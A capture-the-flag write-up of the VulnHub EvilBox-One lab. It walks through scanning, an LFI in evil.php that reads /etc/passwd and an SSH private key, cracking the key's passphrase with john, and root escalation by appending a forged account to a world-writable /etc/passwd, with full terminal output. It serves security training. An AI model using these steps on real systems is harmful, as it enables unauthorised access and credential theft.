evilbox writeup — vulnhub
13 min readJan 10, 2025
source https://www.vulnhub.com/entry/evilbox-one,736/
knowledge required ; linux permissions, LFI web app vulnerability
difficutly: easy
author linkedin.com/in/hassan-hossam-bedair-/
inspired by oscp instructor mohab mustafa ; https://www.linkedin.com/in/mohab-mustafa/
First, I want you to understand this! I won’t just show you the steps right along. We need to understand the *WHY* behind this machine!
What does -rw-rw-rw- mean ?
The command ls -lsa /etc/passwd lists details about the /etc/passwd file. Here's the breakdown:
Output:
4 -rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwdExplanation:
- 4: This indicates the file’s size in terms of disk blocks. Each block is typically 1 KB, so this file takes up 4 KB on disk.
- -rw-rw-rw-: These are the file permissions:
- -: Indicates it is a regular file.
- rw-: Read and write permissions for the owner.
- rw-: Read and write permissions for the group.
- rw-: Read and write permissions for others. This is a dangerous permission setting since anyone can modify this critical system file.
3. 1: The number of hard links to this file (usually 1 for regular files).
4. root root:
- The first
rootis the file owner. - The second
rootis the group associated with the file.
5. 1398: The size of the file in bytes.
6. ago 16 2021: The last modification date and time. It was last modified on August 16, 2021.
7. /etc/passwd: The full path of the file.
/etc/passwd File:
This file contains user account information, including usernames, user IDs, group IDs, and the user’s home directory. It should not have write permissions for anyone other than the owner (root). The current permissions (rw-rw-rw-) are insecure and could lead to system compromise if exploited.
Alright, how can we abuse this?
- generate a MD5-based pass HASH
openssl passwd -1 passwordThe command openssl passwd -1 password generates an MD5-based password hash for the string password. Here's a detailed breakdown:
Components:
openssl: OpenSSL is a toolkit for implementing cryptographic operations, including password hashing.passwd: This subcommand generates password hashes using specified algorithms.-1: This flag specifies the use of the MD5-based hashing algorithm (commonly used for older systems but considered less secure today).password: This is the plaintext password you want to hash.
Output:
Running the command might produce something like this:
$ openssl passwd -1 password
$1$salt$hash$1$: Indicates the use of the MD5 hashing algorithm.salt: A randomly generated string that makes the hash unique, preventing attacks like precomputed dictionary attacks.hash: The hashed representation of the password combined with the salt.
Use Case:
- The generated hash can be used in password files, like
/etc/shadow, to store hashed passwords for user accounts.
Security Note:
- MD5 is no longer considered secure for hashing passwords because it’s vulnerable to collision and brute-force attacks.
— -
Modern alternatives like SHA-256 or bcrypt are recommended for better security:
- For SHA-256:
openssl passwd -6 password - For bcrypt (via another tool): Use
htpasswdor dedicated bcrypt libraries.
Let’s discuss my mistakes before showing you my final command line
- openssl passwd -1 root # now we generated hash of ‘root’ # root will be asked as a password!
- evil.php was not leaked during my ffuf scan. i had to instead use gobuster
Revision) Why was mowree able to edit the /etc/passwd file ?
None of these groups have root privileges, so mowree should not normally have access to edit /etc/passwd. However, due to the rw- permissions for others, mowree can directly edit the file.
— -
File Permissions:
rw-(owner:root): The file owner (root) has read and write permissions.rw-(group:root): The file group (root) has read and write permissions.rw-(others): Everyone else has read and write permissions.
— -
mowree’s User Information:
uid=1000(mowree): User ID and username ofmowree.gid=1000(mowree): Group ID and primary group ofmowree.grupos=1000(mowree),...: Additional groupsmowreebelongs to.
— -
reminder on command output
- Let us id mowree!
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)- let’s find file permissions of /etc/passwd
mowree@EvilBoxOne:~$ ls -lsa /etc/passwd
4 -rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwdOne command line showing all my steps !
┌──(kali㉿kali)-[~]
└─$ sudo su
[sudo] password for kali:
┌──(root㉿kali)-[/home/kali]
└─# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:6e:13:6e, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:59:fa:bc (Unknown)
192.168.56.104 08:00:27:29:c6:cf (Unknown)
^C
┌──(root㉿kali)-[/home/kali]
└─# ping 192.168.56.104
PING 192.168.56.104 (192.168.56.104) 56(84) bytes of data.
64 bytes from 192.168.56.104: icmp_seq=1 ttl=64 time=0.934 ms
^C
--- 192.168.56.104 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.934/0.934/0.934/0.000 ms
┌──(root㉿kali)-[/home/kali]
└─# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=117 time=44.9 ms
^C
--- 8.8.8.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 44.948/44.948/44.948/0.000 ms
┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::ef9c:d01:a30b:1a1c prefixlen 64 scopeid 0x20<link>
ether 08:00:27:6e:13:6e txqueuelen 1000 (Ethernet)
RX packets 12 bytes 2916 (2.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 536 bytes 33910 (33.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.4 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::250d:5230:bbe9:4769 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:ba:8b:d0 txqueuelen 1000 (Ethernet)
RX packets 5 bytes 868 (868.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 26 bytes 3310 (3.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 480 (480.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 480 (480.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root㉿kali)-[/home/kali]
└─#
┌──(root㉿kali)-[/home/kali]
└─#
┌──(root㉿kali)-[/home/kali]
└─# export victim=192.168.56.104
┌──(root㉿kali)-[/home/kali]
└─# echo $victim
192.168.56.104
┌──(root㉿kali)-[/home/kali]
└─# ping $victim
PING 192.168.56.104 (192.168.56.104) 56(84) bytes of data.
64 bytes from 192.168.56.104: icmp_seq=1 ttl=64 time=2.24 ms
64 bytes from 192.168.56.104: icmp_seq=2 ttl=64 time=0.744 ms
^C
--- 192.168.56.104 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1004ms
rtt min/avg/max/mdev = 0.744/1.490/2.236/0.746 ms
┌──(root㉿kali)-[/home/kali]
└─# nmap -sCV $victim
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-10 03:00 EST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 03:00 (0:00:06 remaining)
Nmap scan report for 192.168.56.104
Host is up (0.00029s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:29:C6:CF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.16 seconds
┌──(root㉿kali)-[/home/kali]
└─# cd /usr/share/dirbuster/wordlists/
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# ffuf -w directory-list-lowercase-2.3-medium.txt -t 100 -u http://$victim/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.56.104/FUZZ
:: Wordlist : FUZZ: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# Copyright 2007 James Fisher [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 8ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 6ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 26ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 26ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 781ms]
# directory-list-lowercase-2.3-medium.txt [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 989ms]
# on atleast 2 different hosts [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1563ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1755ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1771ms]
secret [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 3ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3756ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3770ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3782ms]
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3790ms]
# Priority ordered case insensative list, where entries were found [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3798ms]
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 9ms]
[WARN] Caught keyboard interrupt (Ctrl-C)
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://$vicitm/secret
curl: (6) Could not resolve host: secret
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://192.168.56.104/secret
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.104/secret/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.104 Port 80</address>
</body></html>
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://192.168.56.104:80/secret
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.104/secret/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.104 Port 80</address>
</body></html>
### had to quickly mkdir and cd into evilbox
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# gobuster dir -r -u http://192.168.56.104/secret/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -o dir-secret.log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.104/secret/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/evil.php (Status: 200) [Size: 0]
Progress: 61335 / 882244 (6.95%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 64294 / 882244 (7.29%)
===============================================================
Finished
===============================================================
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# ffuf -w directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.56.104/secret/evil.php?FUZZ=/etc/passwd -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.56.104/secret/evil.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________
command [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 12ms]
:: Progress: [207643/207643] :: Job [1/1] :: 5952 req/sec :: Duration: [0:00:41] :: Errors: 0 ::
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://192.168.56.104:80/secret/evil.php?command=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# echo "LFI spotted"
LFI spotted
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://192.168.56.104:80/secret/evil.php?command=/home/mowree/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# ls
apache-user-enum-1.0.txt directory-list-1.0.txt directory-list-lowercase-2.3-medium.txt
apache-user-enum-2.0.txt directory-list-2.3-medium.txt directory-list-lowercase-2.3-small.txt
directories.jbrofuzz directory-list-2.3-small.txt
┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# cd /home/kali/Desktop
┌──(root㉿kali)-[/home/kali/Desktop]
└─# mkdir evilbox
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cd evilbox
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# ls
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# curl http://192.168.56.104:80/secret/evil.php?command=/home/mowree/.ssh/id_rsa >> id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1743 100 1743 0 0 402k 0 --:--:-- --:--:-- --:--:-- 425k
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# ls
id_rsa
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# chmod 600 id_rsa
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# ssh2john id_rsa > key.hash
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# cat key.hash
id_rsa:$sshng$0$8$9FB14B3F3D04E90E$1192$bae426d821487bf7994f9a4dc90ebe2b551aa7f15859cb04925cce36dfb1e003ba1668c5991f11529c0c1eeae66d10ba86aca88aff2f8294204113d83332774204bd9140867600b9f9c5e5342493fc6290392e103103144da723659f04273a1ea3bfbbb4207c664fec5bb6fc7379b80b3d02984e66badf19cae4e70744809460107d98eab2576e8078d9d6dd7b9a575bfa0cd618152629338b3bf81cb80642f938fe0681a46f68277a2300f39a095facbf76aab822bd744289bed2d385b2ea2d6fb03d5d3b9b80496c954126f1f196eb8917df1dcbb5746ca11d769fe92b67a4fe20e4f34e13161314755b1a7851bfe41ed5d3cddbc34016e005fe21d3cab208ec4611a5591ca695ff29c69cebf4ce1959fb3d7add28e9a553cad3b1f86dd2e0f520b5a2662e9ef260ba7312d004c2f2e016ce8439233e646b487e34ea1f52b56d7c967f3a786d30a5be33de3c1209d8ce1ec57ead4a94c8d91f19c84b76dd725e0c155d05dc7a71fa20ee92fc9f79e58aba8794bafccd7d52953d92aac9a26ead1aa7c585bf7f37499bef1756231071c81001a67e65bdab556d20ca27ec1228314a175a4f93c674914a2952d2f9b0f5b47072e943a12829f71fc79db57c2f64dfbd3c3183cd4704a6bf716022e4987fa172bd3aca952d96ef54ade3cb87f5ecf782804cae23a0e216ecef069cf74a06223edc7934a9a90bd64c9841506d323293c8433cc9172cb0666bfcc7559d85a6543e6911d0326ca05f046ff156ed82477efc0512b3949922caa4635d02e814c543cf7237d11a636e97d842cd839b633b31bdbac0d416e1f7fba9edf42bf231ae6ecc7e424fcee7909528bde081d768fbe5e2fc82a0f2d6f3d273b0d0ecbc6f0f86b9164693c8c29cca76d30fc106e43eee3292a80a91861199595f5fca1e8acdc2d610a3aafa772ed87440323eed286b15be70d27d2a7c34f8a34dd4d4fba7da2a9d23833e8836541784b4043df103fce9f9df7c3671a546a32624af92b66a912089370d1464bccc710a6d768360e8b515204f6fa681a6779eae797aacd7461d14d4fe507e13be57c5b36d5ce13faf9132daa05b52f4880801e029d322e77a0e95d0b51f65ffff5a96b5dafb89d67035b61a82a3963c4e28d2bc8d7b39f129d2eb62ebbdc3595689198ea97c5e2ef12f45db124d20b6922d2ed5fbc401cb153559b78507e9cb0e730ab9bef2401a1ebd43f8a4cf95e6c90fb00f0404403ccd78e8fdcc1875fb5ceb766b749bb848e569c825a904336bea0aa96e379084b38bbca7589afa678bd095652e86df9d48318b74339bd485da989f41d78f554e065c684838151fdf86edb348842037feab1d82a70c6801ed6d3262279597d1dac2959487872017c7abf84f7f63c7bd4d1ca73ecccdf637eb1f6e7d9739307d890d3f172911002774b4a4ca653ff65c5e344b3a5112417794436caf6fad66fb3a61834423587d77d609da048855223d672e74da8bdf7ebd87707bcfbc9c9ab8fd65e190df954d85e77444f61f47c5353140a9b9361c6cbafbaa92ff843a0d55714c7769e038364119d14e3a7be1d435359ee3bae72f5bb0c1144f822bcd1d92bafdc85cb26d552a0701eb9a64151462e44b623ff243958c88c52a4190e2b35158a568a3f1da46823f7f61bab5b12239572550c4fc8aeb4083c4b854
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# john key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
unicorn (id_rsa)
1g 0:00:00:00 DONE 2/3 (2025-01-10 03:10) 7.142g/s 90957p/s 90957c/s 90957C/s surfer..unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# echo "unicorn"
unicorn
┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# ssh -i id_rsa mowree@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$
mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
mowree@EvilBoxOne:~$ whoami
mowree
mowree@EvilBoxOne:~$ ls -lsa /etc/passwd
4 -rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwd
mowree@EvilBoxOne:~$ openssl passwd -1 passwd
$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
mowree@EvilBoxOne:~$ ^Cho 'hacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
mowree@EvilBoxOne:~$ ls
attack user.txt
mowree@EvilBoxOne:~$ cat attack
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
# openssl passwd -1 password 'command_output'
# then attach attacker to this 'command_output'
# attacker:'command_output' 'string'
# Now we need to place 'string' into /etc/passwd using echo command
# echo 'string' >> /etc/passwd
# later, we can su attacker!
mowree@EvilBoxOne:~$ echo 'attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
> ' >> /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
